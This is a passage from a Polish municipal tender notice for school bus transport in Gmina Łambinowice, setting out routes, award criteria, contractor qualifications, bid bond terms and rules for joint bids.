Wierzbia – 49,40 km.<br/><br/>Łączna długość dzienna trasy w II części zamówienia wyniesie 98,80 km. <br/><br/>Do dnia złożenia wniosku z posiadanych informacji wynika, że dowozem objętych może być minimum grupa 9 uczniów + opiekun. Należy jednak uwzględnić zmiany, które mogą wystąpić w trakcie roku wskutek zmian wynikających z decyzji rodziców lub pojawienia się konieczności dowożenia innych uczniów, o których nie ma informacji na chwilę składania wniosku. <br/>Zakłada się konieczność zapewnienia 3 dodatkowych miejsc, dlatego pojazd musi być przystosowany do przewozu co najmniej 12 osób+ opiekun + kierowca, w tym wszystkie miejsca siedzące.<br/>Ilość dowożonych uczniów może się zwiększyć bez konieczności wydłużenia trasy lub, w przypadku dodatkowych dzieci z miejscowości, których nie obejmuje aktualna trasa przewozu, długość dziennej trasy będzie musiała ulegać zmianie. Dlatego zakłada się możliwość zmiany treści umowy w trakcie realizacji zamówienia.<br/><br/>	W związku z możliwością zmiany ilości dzieci dowożonych do szkoły w Nysie w trakcie realizacji zamówienia, przewiduje się możliwość zmiany treści umowy na dowóz uczniów do tej szkoły, zawartej w wyniku postępowania przetargowego. Ponieważ dzienna ilość kilometrów drugiej części zamówienia została ustalona na 98,80 km, ilość ta może ulec zmianie w przypadku pojawienia się w trakcie roku szkolnego objętego okresem realizacji zamówienia albo jeszcze przed ich rozpoczęciem konieczności dowozu ucznia z innej miejscowości niż objęta obecną trasą dowozu lub ucznia wymagającego organizacji dodatkowego przewozu. Przyjmuje się, że może się zdarzyć konieczność dowożenia i odwożenia kolejnego ucznia z miejscowości leżącej poza obecnie ustaloną trasą dowozu i odwozu, co w przypadku dziecka zamieszkującego w miejscowości najdalej oddalonej od miejscowości leżących na trasie będzie skutkować zwiększeniem dziennej liczby kilometrów i wydłużenia trasy z 98,80 km do 128,80 km dziennie, co daje możliwy wzrost o 30 %. Każda zmiana związana z koniecznością dowozu dzieci spoza zaplanowanej trasy będzie mieć charakter indywidualny i będzie w inny sposób wpływała na długość łącznej dziennej trasy.<br/>W przypadku konieczności zmiany umowy związanej z wydłużeniem dziennej trasy przewozu, nowe wynagrodzenie wykonawcy będzie ustalone na podstawie wynikającej z zaoferowanej stawki dziennej stawki za 1 kilometr. Kwota wynagrodzenia będzie zwiększona o iloczyn ilości km wydłużenia dziennej trasy i wyliczonej stawki za kilometr.<br/><br/>	Zamawiający zobowiązuje wykonawcę (zarówno części I, jak i II zamówienia) do przestrzegania ustanowionych Standardów Polityki ochrony małoletnich podczas przewozu do szkół, ośrodków rehabilitacyjno-edukacyjno-wychowawczych i przedszkoli z dnia 12.08.2024 r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-09-01 do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Wartość tych zamówień ustala się na nie więcej niż 10% wartości zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający oceni i porówna jedynie te oferty, które zostaną złożone przez Wykonawców niewykluczonych przez Zamawiającego z niniejszego postępowania oraz nie zostaną odrzucone przez Zamawiającego.<br/>Zamawiający wykonuje po ocenie ofert pod względem przedmiotowym (weryfikacja zgodności oferty z przedmiotem zamówienia, prawidłowość złożenia oświadczeń woli, poprawienie omyłek, badanie w zakresie zastrzeżenia tajemnicy przedsiębiorstwa, badanie w kierunku rażąco niskiej ceny itp.) oraz po ustaleniu na podstawie kryteriów oceny ofert określonych w dokumentach zamówienia, rankingu wykonawców i wyłonieniu wykonawcy, którego oferta została uznana za najkorzystniejszą. Zamawiający po wyłonieniu Wykonawcy wzywa go do złożenia podmiotowych środków dowodowych zgodnie z art.274 ustawy PZP.<br/><br/>1.	Kryteria oceny ofert:<br/><br/>a)	Cena brutto „C” – waga kryterium: 60%, maksymalna ilość pkt. 60 <br/>Ocena kryterium „cena” odbędzie się na podstawie ceny brutto podanej w ofercie. Ilość punktów zostanie obliczona wg wzoru:<br/><br/><br/> najniższa oferowana cena spośród wszystkich ważnych ofert<br/> C = ………………..…….………………………………………………………….… x100 x 60%<br/> cena badanej oferty<br/><br/><br/>C- liczba otrzymanych punktów w kryterium cena ofertowa brutto<br/>100- stały wskaźnik<br/>60% waga kryterium<br/><br/>Osiągnięta wartość procentowa według powyższego wzoru będzie odpowiadała uzyskanej liczbie punktów. Maksymalnie w tym kryterium można uzyskać 60 punktów.<br/><br/>b)	Parametry techniczne „T”- waga kryterium: 20%, maksymalna ilość pkt. 20<br/>Ocena kryterium „parametry techniczne” odbędzie się na podstawie wyposażenia autobusu:<br/>-	sprawne ogrzewanie / klimatyzacja - 10 pkt<br/>-	nagłośnienie umożliwiające kontakt opiekuna z dziećmi - 10 pkt <br/><br/>c)	Kryterium „postępowanie w sytuacjach awaryjnych” „A” (czas podstawienia pojazdu zastępczego) – waga kryterium 20%, maksymalna ilość punktów 20<br/>W zakresie kryterium czas podstawienia pojazdu zastępczego „A” – nie krótszy niż 30 minut i nie dłuższy niż 90 minut<br/>Zamawiający dokona oceny tego kryterium następująco:<br/>Czas podstawienia pojazdu zastępczego, wyrażony w minutach liczonych od momentu stwierdzenia awarii, będzie wynosił 30 minut otrzyma najwyższą liczbę punktów, pozostałe proporcjonalnie mniej, wg wzoru:<br/><br/>Czas podstawienia pojazdu zastępczego 30 minut<br/> A = …………………………………..…….……………………………………… x100 x 20% Zaproponowany czas podstawienia pojazdu zastępczego<br/><br/>A – liczba otrzymanych punktów w kryterium czas podstawienia pojazdu zastępczego<br/>100 – stały wskaźnik<br/>20 % - waga kryterium<br/>Ocena ofert przy zastosowaniu kryterium numer 2 b) i c) zostanie dokonana przez Zamawiającego na podstawie informacji zamieszczonych przez Wykonawcę w formularzu oferty. Wykonawca zobowiązany jest samodzielnie uzupełnić w Formularzu oferty oferowany czas podstawienia taboru zastępczego i dokonać wyboru dotyczącego parametrów technicznych. Jeżeli Wykonawca nie uzupełni lub uzupełni innym czasem/lub innym parametrem technicznym wymagane pola w ofercie, Zamawiający przyjmie 0 pkt. za te kryteria.<br/>2. Wynik<br/>Uzyskana z wyliczenia ilość punktów w poszczególnych kryteriach zostanie ostatecznie ustalona z dokładnością do dwóch miejsc po przecinku z zachowaniem zasady zaokrągleń matematycznych.<br/><br/>Ostateczna ilość punktów zostanie obliczona poprzez zsumowanie punktów uzyskanych w poszczególnych kryteriach według wzoru:<br/>LP=C+T+A<br/><br/>Wybrana zostanie oferta, która uzyska najwyższą ilość punktów.<br/>Oferta, która przedstawia najkorzystniejszy bilans (maksymalna liczba przyznanych punktów w oparciu o ustalone kryteria) zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Zamawiający udzieli zamówienie Wykonawcy, którego oferta odpowiada wymaganiom ustawy PZP i niniejszej SWZ oraz zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">b) Parametry techniczne „T”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">„postępowanie w sytuacjach awaryjnych” „A”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: <br/>1)	nie podlegają wykluczeniu;<br/>Zamawiający wykluczy z postępowania o udzielenie zamówienia publicznego Wykonawcę, wobec którego zaistnieją przesłanki do wykluczenia, na zasadach określonych w Rozdziale VIII SWZ.<br/>2)	spełniają warunki udziału w postępowaniu określone w art. 112 ust.2 ustawy PZP dotyczące:<br/> Dla CZĘŚCI I:<br/>a) zdolności do występowania w obrocie gospodarczym – Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>– Warunek będzie spełniony, jeżeli wykonawca posiada uprawnienia przewoźnika drogowego – aktualną licencję/koncesje na wykonywanie krajowego transportu drogowego osób na podstawie ustawy z dnia 06 września 2001r. o transporcie drogowym (Dz. U. z 2024.1539 z póź.zm.),<br/>c) sytuacji ekonomicznej lub finansowej – Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>d) zdolności technicznej lub zawodowej: <br/>A) Wykonawca wykaże się dysponowaniem lub możliwością dysponowania co najmniej 2 sprawnymi autobusami o ilości miejsc umożliwiających przewiezienie jednorazowo minimum 55 osób, w tym co najmniej 44 miejsca siedzące. (Załącznik nr 10 SWZ)<br/>B) Wykonawca wykaże się wykonaniem (a w przypadku świadczeń okresowych lub ciągłych również wykonywanych), co najmniej 1 usługi związanej z transportem uczniów do szkół o wartości min. 150.000,00 zł brutto, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem: wartości, przedmiotu i dat wykonania oraz podmiotów, na rzecz których te usługi zostały wykonane wraz z załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie (załącznik nr 8 do SWZ).<br/>Zastrzeżenie: Jeżeli Wykonawca wykazuje usługę nadal trwającą, musi wykazać, iż na dzień złożenia oferty jest ona należycie realizowana, a wartość już zrealizowanej części wynosi min. 150.000,00 zł brutto. <br/>C) Wykonawca wykaże się dysponowaniem co najmniej dwoma osobami zdolnymi do wykonywania zamówienia, posiadającymi kwalifikacje zawodowe odpowiednie do stanowiska, jakie zostanie mu powierzone (załącznik nr 9 do SWZ), tj.:<br/>- co najmniej dwie osoby, które będą pełnić funkcję kierowcy, posiadającego prawo jazdy odpowiedniej kategorii, uprawniającej do prowadzenia pojazdów, o których mowa powyżej w pkt. A)<br/><br/>Dla CZĘŚCI II<br/>3. Warunki udziału w postępowaniu:<br/>1) zdolności do występowania w obrocie gospodarczym – Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>2)	kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów: <br/>Warunek będzie spełniony, jeżeli wykonawca posiada uprawnienia przewoźnika drogowego –aktualną licencję/koncesje na wykonywanie krajowego transportu drogowego osób na podstawie ustawy z dnia 06 września 2001r. o transporcie drogowym (Dz. U. z 2024.1539 z póź.zm.),<br/>3)	sytuacja ekonomiczna lub finansowa:<br/>Nie precyzuje się.<br/>4)	zdolność techniczna lub zawodowa warunek będzie spełniony, jeżeli: <br/>a) Wykonawca wykaże się dysponowaniem lub możliwością dysponowania co najmniej 1 autobusem o ilości miejsc umożliwiającej przewiezienie co najmniej 12 uczniów + 1 opiekun, licząc tylko miejsca siedzące (załącznik nr 10 SWZ)<br/>b) Wykonawca wykaże się wykonaniem (a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem), co najmniej 1 usługi związanej z transportem uczniów do szkół o wartości min. 70.000,00 zł brutto, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem: wartości, przedmiotu i dat wykonania oraz podmiotów, na rzecz których te usługi zostały wykonane wraz z załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie (załącznik nr 8 do SWZ).<br/>Zastrzeżenie: Jeżeli Wykonawca wykazuje usługę nadal trwającą, musi wykazać, iż na dzień złożenia oferty jest ona należycie zrealizowana na wartość min. 70.000,00 zł brutto. <br/>c) Wykonawca wykaże się dysponowaniem co najmniej jedną osobą zdolną do wykonywania zamówienia, posiadającą kwalifikacje zawodowe odpowiednie do stanowiska, jakie zostanie mu powierzone (załącznik nr 9 do SWZ), tj.:<br/>- co najmniej jedną osobą, która będzie pełnić funkcję kierowcy, posiadającego prawo jazdy odpowiedniej kategorii, uprawniającej do prowadzenia pojazdów, o których mowa powyżej w pkt. 4 a)<br/>4. SPOSÓB OCENY SPEŁNIENIA WARUNKOW DLA WYKONAWCÓW, KTÓRZY SKŁADAJĄ OFERTĘ NA WIĘCEJ NIŻ 1 CZĘŚĆ ZAMÓWIENIA.<br/>Zdolność techniczna lub zawodowa:<br/>przy składaniu przez jednego Wykonawcę ofert na wszystkie części, Wykonawca musi wykazać:<br/>a) posiadanie co najmniej 3 autobusów; dwóch do przewozu co najmniej 55 osób, w tym co najmniej 44 miejsca siedzące i jednego do przewozu minimum 12 osób + 1 opiekun, licząc tylko miejsca siedzące.<br/>b) się spełnieniem warunków dla tej części zamówienia, dla której zostały one ustalone na wyższym poziomie, tj.: co najmniej 1 usługą związaną z transportem uczniów do szkół o wartości min. 150.000,00 zł brutto, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem: wartości, przedmiotu i dat wykonania oraz podmiotów, na rzecz których te usługi zostały wykonane wraz z załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie (załącznik nr 8 do SWZ).<br/> c) się dysponowaniem co najmniej 3 osobami posiadającymi odpowiednie prawo jazdy uprawniające do kierowania pojazdami, którymi będzie wykonywane zamówienie, chyba, że wykonawca samodzielnie będzie wykonywać jedną część zamówienia wówczas wykonawca wykaże się dysponowaniem 1 osobą posiadającą odpowiednie prawo jazdy uprawniające do kierowania pojazdami, którymi będzie wykonywane zamówienie.<br/>d) posiadanie uprawnień przewoźnika drogowego –aktualną licencję/koncesje na wykonywanie krajowego transportu drogowego osób na podstawie ustawy z dnia 06 września 2001r. o transporcie drogowym (Dz. U. z 2024.1539 z póź.zm.),<br/>UWAGA DOTYCZY CZ. I i II<br/><br/>Autobusy muszą być dostosowane do przewozu uczniów, posiadać odpowiednią liczbę miejsc dostosowaną do wskazanej w SWZ szacunkowej liczby uczniów, odpowiednio oznakowane (z przodu i z tyłu autobusów należy umieścić tablicę koloru żółtego z czarnym napisem „Autobus szkolny”, znak „Stop” oraz znak „Uwaga Dzieci”, wyraźnie widoczne podczas wsiadania i wysiadania uczniów).<br/>Zależnie od potrzeb i indywidualnego planu zajęć uczniów usługa może być realizowana innym pojazdem niż ujętym w wykazie autobusem, ale spełniającym wszelkie kryteria określone dla przewozów szkolnych.<br/>Opiekę nad uczniami w czasie przewozu zapewnia Zleceniodawca. Przewoźnik zobowiązany jest do współpracy z opiekunem, tak aby umożliwić mu skuteczne wykonanie zadań.<br/><br/>W przypadku złożenia przez Wykonawców dokumentów potwierdzających wykonane usługi, zawierających dane w innych walutach niż PLN, Zamawiający jako kurs przeliczeniowy waluty przyjmie przelicznik wg średniego kursu NBP z dnia ukazania się ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.<br/>2.	Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnienie warunku przez Wykonawców.<br/>3.	Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>4.	Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust.2 pkt.2, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegający się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do realizacji których te zdolności są wymagane.<br/>Wykonawca na żądanie Zamawiającego i w zakresie przez niego wskazanym jest obowiązany wykazać odpowiednio, nie później niż na dzień składania oświadczeń lub dokumentów, spełnienie warunków, o których mowa w art. 112 ust.2 pkt 2 i 4 ustawy PZP. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	Zamawiający nie będzie wymagał złożenia przez wykonawców dodatkowych, innych niż oświadczenie wymienione w art. 125 ust. 1 u.p.z.p., podmiotowych środków dowodowych, potwierdzających niepodleganie wykluczeniu z postępowania, w drodze wyjątku z zastrzeżeniem okoliczności, o których mowa w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej;– załącznik nr 4 do SWZ;<br/>2)	Na podstawie art. 128 ust. 1 u.p.z.p. w związku z § 3 i Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy, w celu potwierdzenia braku podstaw wykluczenia i spełnienia warunków wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, Zamawiający wezwie wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu – stanowiącym załącznik nr 11 do SWZ dot. podstaw wykluczenia, o którym mowa w art. 125 ust. 1 u.p.z.p.,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dla CZĘŚCI I:<br/>a) zdolności do występowania w obrocie gospodarczym – Zamawiający nie stawia warunku w powyższym zakresie.<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>– Warunek będzie spełniony, jeżeli wykonawca posiada uprawnienia przewoźnika drogowego – aktualną licencję/koncesje na wykonywanie krajowego transportu drogowego osób na podstawie ustawy z dnia 06 września 2001r. o transporcie drogowym (Dz. U. z 2024.1539 z póź.zm.),<br/>c) sytuacji ekonomicznej lub finansowej – Zamawiający nie stawia warunku w powyższym zakresie.<br/>d) zdolności technicznej lub zawodowej: <br/>A) Wykonawca wykaże się dysponowaniem lub możliwością dysponowania co najmniej 2 sprawnymi autobusami o ilości miejsc umożliwiających przewiezienie jednorazowo minimum 55 osób, w tym co najmniej 44 miejsca siedzące. (Załącznik nr 10 SWZ)<br/>B) Wykonawca wykaże się wykonaniem (a w przypadku świadczeń okresowych lub ciągłych również wykonywanych), co najmniej 1 usługi związanej z transportem uczniów do szkół o wartości min. 150.000,00 zł brutto, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem: wartości, przedmiotu i dat wykonania oraz podmiotów, na rzecz których te usługi zostały wykonane wraz z załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie (załącznik nr 8 do SWZ).<br/>Zastrzeżenie: Jeżeli Wykonawca wykazuje usługę nadal trwającą, musi wykazać, iż na dzień złożenia oferty jest ona należycie realizowana, a wartość już zrealizowanej części wynosi min. 150.000,00 zł brutto. <br/>C) Wykonawca wykaże się dysponowaniem co najmniej dwoma osobami zdolnymi do wykonywania zamówienia, posiadającymi kwalifikacje zawodowe odpowiednie do stanowiska, jakie zostanie mu powierzone (załącznik nr 9 do SWZ), tj.:<br/>- co najmniej dwie osoby, które będą pełnić funkcję kierowcy, posiadającego prawo jazdy odpowiedniej kategorii, uprawniającej do prowadzenia pojazdów, o których mowa powyżej w pkt. A)<br/>Cz. II<br/>a) Wykonawca wykaże się dysponowaniem lub możliwością dysponowania co najmniej 1 autobusem o ilości miejsc umożliwiającej przewiezienie co najmniej 12 osób + 1 opiekun, licząc tylko miejsca siedzące (załącznik nr 10 do SWZ).<br/>b) Wykonawca wykaże się wykonaniem (a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem), co najmniej 1 usługi związanej z transportem uczniów do szkół o wartości min. 70.000,00 zł brutto, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem: wartości, przedmiotu i dat wykonania oraz podmiotów, na rzecz których te usługi zostały wykonane wraz z załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie (załącznik nr 8 do SWZ).<br/>Zastrzeżenie: Jeżeli Wykonawca wykazuje usługę nadal trwającą, musi wykazać, iż na dzień złożenia oferty jest ona należycie zrealizowana na wartość min. 70.000,00 zł brutto.<br/>c) Wykonawca wykaże się dysponowaniem co najmniej jedną osobą zdolną do wykonywania zamówienia, posiadającą kwalifikacje zawodowe odpowiednie do stanowiska, jakie zostanie mu powierzone (załącznik nr 9 do SWZ), tj.:<br/>- co najmniej jedną osobą, która będzie pełnić funkcję kierowcy, posiadającego prawo jazdy odpowiedniej kategorii, uprawniającej do prowadzenia pojazdów, o których mowa powyżej w pkt. a)<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi Wykonawcami, ww. wykaz dotyczy usług, w których Wykonawca ten bezpośrednio uczestniczył.<br/>d) Wykonawca posiada uprawnienia przewoźnika drogowego –aktualną licencję/koncesje na wykonywanie krajowego transportu drogowego osób na podstawie ustawy z dnia 06 września 2001r. o transporcie drogowym (Dz. U. z 2024.1539 z póź.zm.),</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości:<br/> 1.Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: <br/>- dla CZ.I zamówienia 7 000,00 zł (słownie: cztery tysiące złotych 00/100).<br/>- dla CZ.II zamówienia 1 300,00 zł ( słownie: tysiąc trzysta złotych 00/100).<br/>2. Wadium wnosi się przed upływem terminu składania ofert.<br/>3. Wadium może być wnoszone w jednej lub kilku formach przewidzianych w art.97 ust.7:<br/>1) w pieniądzu<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego: <br/>Bank Spółdzielczy Prudnik Filia Łambinowice Nr 89 8905 1010 9001 0012 5413 0001<br/>tytułem: „wadium – „Dowóz uczniów i dzieci do szkół podstawowych i przedszkoli na terenie Gminy Łambinowice oraz dowóz uczniów do szkoły w Nysie” – Cz…..ZP.271.8.2025<br/>W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego. Zaleca się, aby Wykonawca dołączył do oferty dowód wpłaty wadium- potwierdzający dokonanie przelewu. W formularzu ofertowym – załącznik nr 1 do SWZ należy podać numer konta, na jakie Zamawiający dokona zwrotu wadium.<br/>5. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej, opatrzone kwalifikowanym podpisem elektronicznym przez wystawcę poręczenia lub gwarancji i spełniać co najmniej poniższe wymagania:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie p.z.p. <br/>2) z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem, iż pierwszym dniem związania ofertą jest dzień składania ofert); <br/>5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6) beneficjentem poręczenia lub gwarancji jest: Gmina Łambinowice; <br/>7) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 p.z.p.), Zamawiający wymaga, aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>7. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 p.z.p. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale IX ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi, wykonają poszczególni wykonawcy. W przypadku gdy ofertę składa spółka cywilna, a pełen zakres prac wykonają wspólnicy wspólnie w ramach umowy spółki oświadczenie powinno potwierdzać ten fakt. Oświadczenie należy złożyć wg wymogów załącznika nr 7 do SWZ. Oświadczenie to składa się w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>5.	Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w Rozdziale VII SWZ ust.1 pkt. 2 b) dla Cz. I oraz ust.3 pkt.2 dla Cz.II, będzie spełniony jeżeli co najmniej jeden z wykonawców wspólnie ubiegający się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i realizuje usługi, do realizacji których te zdolności są wymagane.<br/>6.	Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnienie warunku przez Wykonawców.<br/>7.	Oferta musi być podpisana w taki sposób, by poprawnie zobowiązywała wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>8.	Jeżeli w postępowaniu zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, kopii umowy regulującej współpracę tych Wykonawców. <br/>9.	Wypełniając formularz oferty należy wpisać dane (nazwa, adres itd.) Pełnomocnika (Lidera) oraz wszystkich Wykonawców wspólnie ubiegających się o zamówienie. W innych 